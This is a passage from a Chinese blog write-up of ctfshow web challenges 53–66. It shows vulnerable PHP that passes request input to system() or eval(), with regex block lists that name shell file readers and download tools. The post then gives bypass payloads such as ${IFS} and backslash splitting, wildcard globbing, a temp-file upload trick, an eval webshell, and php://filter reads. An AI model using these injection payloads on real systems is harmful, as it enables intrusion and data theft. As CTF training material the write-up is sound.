<h2 id="Web53"><a href="#Web53" class="headerlink" title="Web53"></a>Web53</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[&#39;c&#39;]))&#123;</span><br><span class="line">    $c&#x3D;$_GET[&#39;c&#39;];</span><br><span class="line">    if(!preg_match(&quot;&#x2F;\;|cat|tac|flag| |[0-9]|\\$|more|less|head|sort|tail|\*|sed|cut|awk|string|od|curl|\&#39;|\%|\x09|\x26&#x2F;i&quot;, $c))&#123;</span><br><span class="line">        echo($c);</span><br><span class="line">		$d &#x3D; system($c);</span><br><span class="line">		echo &quot;&lt;br&gt;&quot;.$d;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>c=ta\c${IFS}fla\g.php</p>
<h2 id="Web54"><a href="#Web54" class="headerlink" title="Web54"></a>Web54</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[&#39;c&#39;]))&#123; </span><br><span class="line">    $c&#x3D;$_GET[&#39;c&#39;]; </span><br><span class="line">    if(!preg_match(&quot;&#x2F;\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\&#96;|\%|\x09|\x26|\&gt;|\&lt;&#x2F;i&quot;, $c))&#123; </span><br><span class="line">        system($c); </span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>这次过滤了很多字母，也不能用\的形式进行分割了，但是还有列一个读取命令grep可以使用<br>Grep flag flag.php查找flag.php文件中含有flag的那一行，并且打印出来</p>
<p>构造payload，在flag.php中查找带有show字符串的一行，（因为flag的格式为ctfshow{}）</p>
<p>?c=grep${IFS}show${IFS}fla?.php</p>
<h2 id="Web55"><a href="#Web55" class="headerlink" title="Web55"></a>Web55</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F; 你们在炫技吗？</span><br><span class="line">if(isset($_GET[&#39;c&#39;]))&#123;</span><br><span class="line">$c&#x3D;$_GET[&#39;c&#39;];</span><br><span class="line">if(!preg_match(&quot;&#x2F;\;|[a-z]|\&#96;|\%|\x09|\x26|\&gt;|\&lt;&#x2F;i&quot;, $c))&#123;</span><br><span class="line">system($c);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>把字母给给过滤了<br>Rce<br>看的别人的题解<br><img src="/image/web%E5%85%A5%E9%97%A840.png"><br><img src="/image/web%E5%85%A5%E9%97%A841.png"><br><img src="/image/web%E5%85%A5%E9%97%A842.png"><br>解码得到flag，这样都能做出来也是很迷</p>
<p>下面就写一下我懂了的题解</p>
<h2 id="Web56"><a href="#Web56" class="headerlink" title="Web56"></a>Web56</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F; 你们在炫技吗？</span><br><span class="line">if(isset($_GET[&#39;c&#39;]))&#123;</span><br><span class="line">	$c&#x3D;$_GET[&#39;c&#39;];</span><br><span class="line">		if(!preg_match(&quot;&#x2F;\;|[a-z]|[0-9]|\\$|\(|\&#123;|\&quot;|\&#96;|\&#96;|\%|\x09|\x26|\&gt;|\&lt;&#x2F;i&quot;, $c))&#123;</span><br><span class="line">			system($c);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>数字字母都过滤了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html lang&#x3D;&quot;en&quot;&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta charset&#x3D;&quot;UTF-8&quot;&gt;</span><br><span class="line">    &lt;meta name&#x3D;&quot;viewport&quot; content&#x3D;&quot;width&#x3D;device-width, initial-scale&#x3D;1.0&quot;&gt;</span><br><span class="line">    &lt;title&gt;POST数据包POC&lt;&#x2F;title&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;form action&#x3D;&quot;http:&#x2F;&#x2F;3546f019-c02c-4c6d-8ca9-0efc98c20222.challenge.ctf.show:8080&#x2F;&quot; method&#x3D;&quot;post&quot; enctype&#x3D;&quot;multipart&#x2F;form-data&quot;&gt;</span><br><span class="line"></span><br><span class="line">   &lt;p&gt; &lt;input type&#x3D;&quot;file&quot; name&#x3D;&quot;file&quot; &gt;&lt;&#x2F;p&gt;</span><br><span class="line">   &lt;p&gt; &lt;input type&#x3D;&quot;submit&quot; value&#x3D;&quot;submit&quot;&gt;&lt;&#x2F;p&gt;</span><br><span class="line">&lt;&#x2F;form&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br></pre></td></tr></table></figure>
<p>下面这一段是解释上面的代码<br>为什么要上传文件呢？<br>上传文件之后，服务器的PHP会接受到这个文件，他不知道你这个脚本文件后面还有没有处理这个上传文件的一个逻辑，现在文件已经上传上来了，他如果要用的话万一你后面没了怎么办，如果没了上传的文件的话，你后面的脚本又要取这个数据他又拿不到，所以作为PHP的话他没办法，就想了一个折中的办法，我把每次脚本执行凡是有文件上传都放在一个地方，然后等脚本执行完了，要用就拿走，不用了就清空。就放在临时目录，命名规则phpaaaaaX(php+五位小写字母+一位大写字母)；点”.”这个符号在linux下是可以执行脚本的。</p>
<p>随便上传一个文件，然后抓包，注意图片可修改的两个地方<br><img src="/image/web%E5%85%A5%E9%97%A843.png"></p>
<h2 id="Web57"><a href="#Web57" class="headerlink" title="Web57"></a>Web57</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F; 你们在炫技吗？</span><br><span class="line">if(isset($_GET[&#39;c&#39;]))&#123;</span><br><span class="line">	$c&#x3D;$_GET[&#39;c&#39;];</span><br><span class="line">		if(!preg_match(&quot;&#x2F;\;|[a-z]|[0-9]|\\$|\(|\&#123;|\&quot;|\,|\?|\&#96;|\&#96;|\%|\x09|\x26|\&gt;|\&lt;&#x2F;i&quot;, $c))&#123;</span><br><span class="line">			system($c);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>太可恶了，把点和问号都过滤了<br><img src="/image/web%E5%85%A5%E9%97%A844.png"><br><img src="/image/web%E5%85%A5%E9%97%A845.png"></p>
<p>也是很神奇<br>$((<del>$(($((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))+$((<del>$(())))+$((</del>$(())))))))<br><img src="/image/web%E5%85%A5%E9%97%A846.png"></p>
<h2 id="Web58"><a href="#Web58" class="headerlink" title="Web58"></a>Web58</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_POST[&#39;c&#39;]))&#123;</span><br><span class="line">	$c&#x3D;$_POST[&#39;c&#39;];</span><br><span class="line">	eval($c);</span><br><span class="line">&#125;else&#123;&#125;</span><br></pre></td></tr></table></figure>
<p>就听说可以用蚁剑，然后试一下果然就可以，连接密码是c<br>然后就能找到flag了，<br>但是还有别的方法<br>POSTS<br>Phpinfo();system(); c=echo shell_exec(‘ls’);<br>如?c=echo file_get_contents(“flag.php”);</p>
<h2 id="Web59"><a href="#Web59" class="headerlink" title="Web59"></a>Web59</h2><p>和上一题一样</p>
<p>Post<br>C=include($_GET[1]);</p>
<p>Get<br>?1=php://filter/convert.base64-encode/resource=flag.php</p>
<h2 id="Web60"><a href="#Web60" class="headerlink" title="Web60"></a>Web60</h2><h2 id="Web61"><a href="#Web61" class="headerlink" title="Web61"></a>Web61</h2><h2 id="Web62-65"><a href="#Web62-65" class="headerlink" title="Web62-65"></a>Web62-65</h2><h2 id="Web66"><a href="#Web66" class="headerlink" title="Web66"></a>Web66</h2><p>c=highlight_file(‘/flag.txt’);</p>

        <p class="suffix-end">__END__</p>
        <div class="suffix-box">
            <div class="suffix-box-left">
                <img src="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/image/sidebar/avatar.jpg" alt="Live For Code">
            </div>
            <div class="suffix-box-right">
                <span class="suffix-box-title">文章作者</span>：Live For Code
                <br>
                <span class="suffix-box-title">文章出处</span>：<a href="/2021/04/23/ctfshow-web%E5%85%A5%E9%97%A8/" target="_blank">ctfshow-web入门</a>
                <br>
                <span class="suffix-box-title">作者签名</span>：简单地活着, 肆意又精彩.
                <br>
                <span class="suffix-box-title">关于主题</span>：<a href="https://github.com/first19326/Hexo-LiveForCode" target="_blank">Hexo - Live For Code</a>
                <br>
                <span class="suffix-box-title">版权声明</span>：文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" title="BY-NC-SA" target="_blank">BY-NC-SA</a> 许可协议，转载请注明出处
                <br>
            </div>
            <div style="clear: both;"></div>
        </div>
    </div>
    <div class="article-footer">
        
            <div class="category">
                分类：
                
                    <a href="/category/WP-ctfshow/">-WP -ctfshow</a>
                
            </div>
        
        
            <div class="tag">
                标签：
                
                    <a href="/tag/WP/">-WP</a>
                
            </div>
        
        <div class="article-prev-next">
            
            
                <a href="/2021/04/23/hello-world/" class="next-prefix">» </a> 下一篇：    <a href="/2021/04/23/hello-world/" title="发布于 2021-04-23 11:50">Hello World</a>
            
        </div>
    </div>
    
    <div class="article-comments">
        <div class="comments-title">
            评论列表
        </div>
        <div class="comments-content">
        </div>
    </div>

</div>

    </div>
</div>
    <div id="footer"></div>
    <div id="sidebar">
    <div class="menu-wrap" style="display:none;">
        <nav class="menu">
            <div class="menu-introduce"> 
                <div class="introduce-avatar"></div> 
                <div class="introduce-info"> 
                    <div class="introduce-user"><span></span></div>        
                </div> 
            </div> 
            <div class="menu-list">
                <ul></ul> 
            </div> 
            <div class="menu-link"></div> 
        </nav>
        <button class="menu-button-close"></button>
        <div class="morph-shape" id="morph-shape" data-morph-open="M-7.312,0H15c0,0,66,113.339,66,399.5C81,664.006,15,800,15,800H-7.312V0z;M-7.312,0H100c0,0,0,113.839,0,400c0,264.506,0,400,0,400H-7.312V0z">
            <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 100 800" preserveAspectRatio="none">
                <path d="M-7.312,0H0c0,0,0,113.839,0,400c0,264.506,0,400,0,400h-7.312V0z"/>
            </svg>
        </div>
    </div>
    <button class="menu-button-open">MENU</button>
    <div class="menu-cover"></div>
</div>
    <link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/search.css">
<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/iscroll.js"></script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/instantsearch.min.js"></script>
<div class="search-window">
    <div class="search-content">
        <div class="search-content-icon">
            <i class="iconfont icon-search"></i>
        </div>
        <div id="search-input" class="search-input"></div>
    </div>

    <div class="search-scroll">
        <div class="search-result">
            <div id="search-stats" class="search-stats"></div>
            <div id="search-hits"></div>
            <div id="search-pagination" class="search-pagination"></div>
        </div>
    </div>

    <span class="search-close-icon">
        <i class="iconfont icon-close"></i>
    </span>
</div>
    <div id="tools">
    <div class="progressbar-top"></div>

    
        <link type="text/css" rel="stylesheet" href="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/APlayer.css">
        <script type="text/javascript" src="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/APlayer.min.js"></script>
        <script type="text/javascript" src="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/Meting.min.js"></script>
        <meting-js id="3778678" lrcshow="false" server="netease" type="playlist" fixed="true" autoplay="false" loop="all" order="random" preload="auto" volume="0.67" mutex="true"></meting-js>
    
    
    <div class="wrap-right"></div>
    <div class="loading"></div>
</div>
    <script>
    window.config = {
        GitHubUserName     : 'first19326',
        GitHubRepositories : 'Hexo-LiveForCode',

        BlogUser      : 'Live For Code',
        BlogAvatar    : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/image/sidebar/avatar.jpg',
        BlogStartDate : '2020-01-01',

        WebsiteTitleBlur         : '(◍´꒳`◍) Hi, Live For Code',
        WebsiteTitleBlurTimeOut  : 500,
        WebsiteTitleFocus        : '(*´∇｀*) 欢迎回来!',
        WebsiteTitleFocusTimeOut : 1000,
        WebsiteFavicon           : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/image/website/logo.png',

        ProgressBar: {
            id       : 'topProgressBar',
            color    : '#77B6FF',
            height   : '2px',
            duration : 0.2
        },

        Loading: {
            rebound: {
                tension  : 16,
                friction : 5
            },
            spinner: {
                id     : 'spinner',
                radius : 90,
                sides  : 3,
                depth  : 4,
                colors : {
                    background : '#F0F0F0',
                    stroke     : '#272633',
                    base       : '',
                    child      : '#272633'
                },
                alwaysForward : true,
                restAt        : 0.5,
                renderBase    : false
            }
        },

        HomeHeaderAnimationRendered : true,
        HomeHeaderAnimation         : {
            radius      : 15,
            density     : 0.2,
            color       : 'rgba(255, 255, 255, .2)',
            clearOffset : 0.3
        },

        ArticleHeaderAnimationRendered : false,
        ArticleHeaderAnimation         : {
            triW                  : 14,
            triH                  : 20,
            neighbours            : [
                
                    'side',
                
                    'top',
                
                    'bottom',
                
            ],
            speedTrailAppear      : 0.1,
            speedTrailDisappear   : 0.1,
            speedTriOpen          : 1,
            trailMaxLength        : 30,
            trailIntervalCreation : 100,
            delayBeforeDisappear  : 2,
            colors                : [
                
                    '#96EDA6',
                
                    '#5BC6A9',
                
                    '#38668C',
                
                    '#374D84',
                
                    '#BED5CB',
                
                    '#62ADC6',
                
                    '#8EE5DE',
                
                    '#304E7B',
                
            ]
        },

        BackAnimationRendered          : true,
        IEBrowserBackAnimationRendered : false,
        BackAnimation                  : {
            colorSaturation  : '60%',
            colorBrightness  : '50%',
            colorAlpha       : 0.5,
            colorCycleSpeed  : 5,
            verticalPosition : 'random',
            horizontalSpeed  : 200,
            ribbonCount      : 3,
            strokeSize       : 0,
            parallaxAmount   : -0.2,
            animateSections  : true
        },

        HomeHeaderImage : [
            
                'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/image/header/home.jpg',
            
                'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/image/header/home.jpeg',
            
        ],
        HomeBannerText  : '',

        ArticleHeaderImage : [
            
                'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/image/header/article.jpg',
            
        ],

        OtherBannerText : '',

        MenuList : [
            
                {
                    name   : '首页',
                    href   : '/',    
                    target : '',
                    class  : ''
                },
            
                {
                    name   : '标签',
                    href   : '/tag',    
                    target : '',
                    class  : ''
                },
            
                {
                    name   : '分类',
                    href   : '/category',    
                    target : '',
                    class  : ''
                },
            
                {
                    name   : '归档',
                    href   : '/archive',    
                    target : '',
                    class  : ''
                },
            
                {
                    name   : '赞赏',
                    href   : '/donate',    
                    target : '',
                    class  : ''
                },
            
                {
                    name   : '关于',
                    href   : '/about',    
                    target : '',
                    class  : ''
                },
            
                {
                    name   : '订阅',
                    href   : '/atom.xml',    
                    target : '_blank',
                    class  : ''
                },
            
                {
                    name   : '搜索',
                    href   : '',    
                    target : '',
                    class  : 'search'
                },
            
                {
                    name   : '留言板',
                    href   : '/comment',    
                    target : '',
                    class  : ''
                },
            
                {
                    name   : '友情链接',
                    href   : '/friend',    
                    target : '',
                    class  : ''
                },
            
        ],
        MenuLink : [
            
                
                    {
                        icon : 'icon-weibo', 
                        url  : ''
                    },
                
                    {
                        icon : 'icon-wechat', 
                        url  : ''
                    },
                
                    {
                        icon : 'icon-qq', 
                        url  : ''
                    },
                
                    {
                        icon : 'icon-github', 
                        url  : 'https://github.com/first19326'
                    },
                
            
        ],

        FooterStyle : 2,
        BottomText  : {
            icon    : 'like-fill',
            left    : '人生若只如初见',
            right   : '何事秋风悲画扇'
        },
        ThemeInfo   : true,

        ConsoleList : [
            
                
                    [
                        
                            
                                'Based on cnblogs theme SimpleMemory.',
                            
                                '',
                            
                        
                    ],
                
                    [
                        
                            
                                'SimpleMemory Author:',
                            
                                'BNDong',
                            
                        
                    ],
                
                    [
                        
                            
                                'Theme:',
                            
                                'LiveForCode',
                            
                        
                    ],
                
            
        ],

        FontIconExtend : '',

        Donate : {
            paypal  : '',
            bitcoin : '',
            alipay  : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/image/donate/alipay.png',
            wechat  : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/image/donate/wechat.png'
        },

        Code : {
            style : 'normal'
        },  

        Search : {
            applicationID : '010C3EANT8',
            apiKey        : 'c7abab9f11b79102b9aff7fe6d41447d',
            indexName     : 'Notes',
            hits          : {
                page : 10
            },
            labels        : {
                placeholder : '搜索',
                empty       : '未发现与 「${query}」 相关的内容',
                stats       : '${hits} 条相关条目，使用了 ${time} 毫秒',
            }
        }, 

        Valine : {
            switch         : true,
            el             : '.comments-content',
            appId          : 'srhKtvWPQTWYKh3qX8G8M7v0-gzGzoHsz',
            appKey         : '8uVSP1q6UlALVC5igYfIfv2h',
            placeholder    : '你是我一生只会遇见一次的惊喜...',
            avatar         : 'mm',
            meta           : 'nick,mail,link',
            requiredFields : 'nick,mail',
            pageSize       : 5,
            lang           : 'zh-cn',
            visitor        : true,
            enableQQ       : true
        },

        Tocbot : {
            switch                : true,
            tocSelector           : '.toc',
            contentSelector       : '.article-body',
            headingSelector       : 'h1, h2, h3, h4, h5',
            headingsOffset        : 0,
            scrollSmooth          : true,
            scrollSmoothOffset    : -5,
            positionFixedSelector : '.toc',
            positionFixedClass    : 'toc-fixed',
            fixedSidebarOffset    : '',
        },

        Require : {
            baseUrl     : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/',
            waitSeconds : 100
        },

        Music : {
            type : 'Meting'
        },
        APlayer : {
            container : '.aplayer',
            fixed     : true,
            autoplay  : false,
            loop      : 'all',
            order     : 'random',
            preload   : 'auto',
            volume    : 0.67,
            mutex     : true,
            lrcType   : 3,
            audio     : [
                
                    {
                        name   : 'aLIEz',
                        artist : 'mizuki（瑞葵）',
                        cover  : '/music/cover/aLIEz.jpg',
                        url    : '/music/song/aLIEz.mp3',
                        lrc    : '/music/lrc/aLIEz.lrc'
                    },
                
                    {
                        name   : 'Endless Tears',
                        artist : 'CLIFF EDGE',
                        cover  : '/music/cover/Endless Tears.jpg',
                        url    : '/music/song/Endless Tears.mp3',
                        lrc    : '/music/lrc/Endless Tears.lrc'
                    },
                
                    {
                        name   : 'Miracle',
                        artist : 'Cascada',
                        cover  : '/music/cover/Miracle.jpg',
                        url    : '/music/song/Miracle.mp3',
                        lrc    : '/music/lrc/Miracle.lrc'
                    },
                
                    {
                        name   : 'Roll The Dice',
                        artist : '高珊',
                        cover  : '/music/cover/Roll The Dice.jpg',
                        url    : '/music/song/Roll The Dice.mp3',
                        lrc    : '/music/lrc/Roll The Dice.lrc'
                    },
                
                    {
                        name   : 'See You Again',
                        artist : 'Charlie Puth, Wiz Khalifa',
                        cover  : '/music/cover/See You Again.jpg',
                        url    : '/music/song/See You Again.mp3',
                        lrc    : '/music/lrc/See You Again.lrc'
                    },
                
                    {
                        name   : 'Traveling Light',
                        artist : 'Joel Hanson, Sara Groves',
                        cover  : '/music/cover/Traveling Light.jpg',
                        url    : '/music/song/Traveling Light.mp3',
                        lrc    : '/music/lrc/Traveling Light.lrc'
                    },
                
                    {
                        name   : '痴心绝对',
                        artist : '李圣杰',
                        cover  : '/music/cover/痴心绝对.jpg',
                        url    : '/music/song/痴心绝对.mp3',
                        lrc    : '/music/lrc/痴心绝对.lrc'
                    },
                
                    {
                        name   : '好想大声说爱你',
                        artist : 'BAAD（バード）',
                        cover  : '/music/cover/好想大声说爱你.jpg',
                        url    : '/music/song/好想大声说爱你.mp3',
                        lrc    : '/music/lrc/好想大声说爱你.lrc'
                    },
                
            ]
        },
        Meting : {
            id       : '3778678', 
            lrcshow  : false, 
            server   : 'netease', 
            type     : 'playlist', 
            fixed    : true, 
            autoplay : false, 
            loop     : 'all', 
            order    : 'random', 
            preload  : 'auto', 
            volume   : 0.67, 
            mutex    : true
        },

        LazyLoad : {
            default : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/image/website/lazyload.svg'
        },
  
        Style : {
            aplayer          : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/APlayer.css',
            archive          : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/archive.css',
            donate           : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/donate.css',
            fancybox         : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/jquery.fancybox.css',
            footer           : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/footer.css',
            iconfont         : 'https://at.alicdn.com/t/font_1546312_l3yohatebw.css',
            index            : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/index.css',
            menuBubble       : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/menu-bubble.css',
            page             : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/page.css',
            post             : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/post.css',
            search           : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/search.css',
            tocbot           : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/tocbot.css',
            normal           : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/normal.css',
            night            : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/night.css',
            clipboard        : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/css/clipboard.css'
        },

        Script: {
            aplayer          : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/APlayer.min.js',
            config           : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/require.config.js',
            index            : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/index.js',
            instantSearch    : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/instantsearch.min.js',
            jQuery           : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/jquery-3.4.1.min.js',
            loading          : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/loading.js',
            meting           : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/Meting.min.js',
            iscroll          : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/iscroll.js',
            require          : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/require.min.js'
        },

        Font: {
            LongCang   : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/LongCang.css',
            Monda      : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/Monda.css',
            NotoSansSC : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/NotoSansSC.css',
            Playball   : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/Playball.css',
            PTMono     : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/PTMono.css',
            RobotoSlab : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/RobotoSlab.css',
            Rosario    : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/Rosario.css',
            UbuntuMono : 'https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/font/UbuntuMono.css'
        },

        Suffix : {
            about : '简单地活着, 肆意又精彩.'
        },
            
        Theme : {
            url  : 'https://github.com/first19326/Hexo-LiveForCode',
            name : 'Hexo - Live For Code'
        }  
    };
</script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/gh/first19326/cdn@master/static/js/index.js"></script>
</body>
</html>
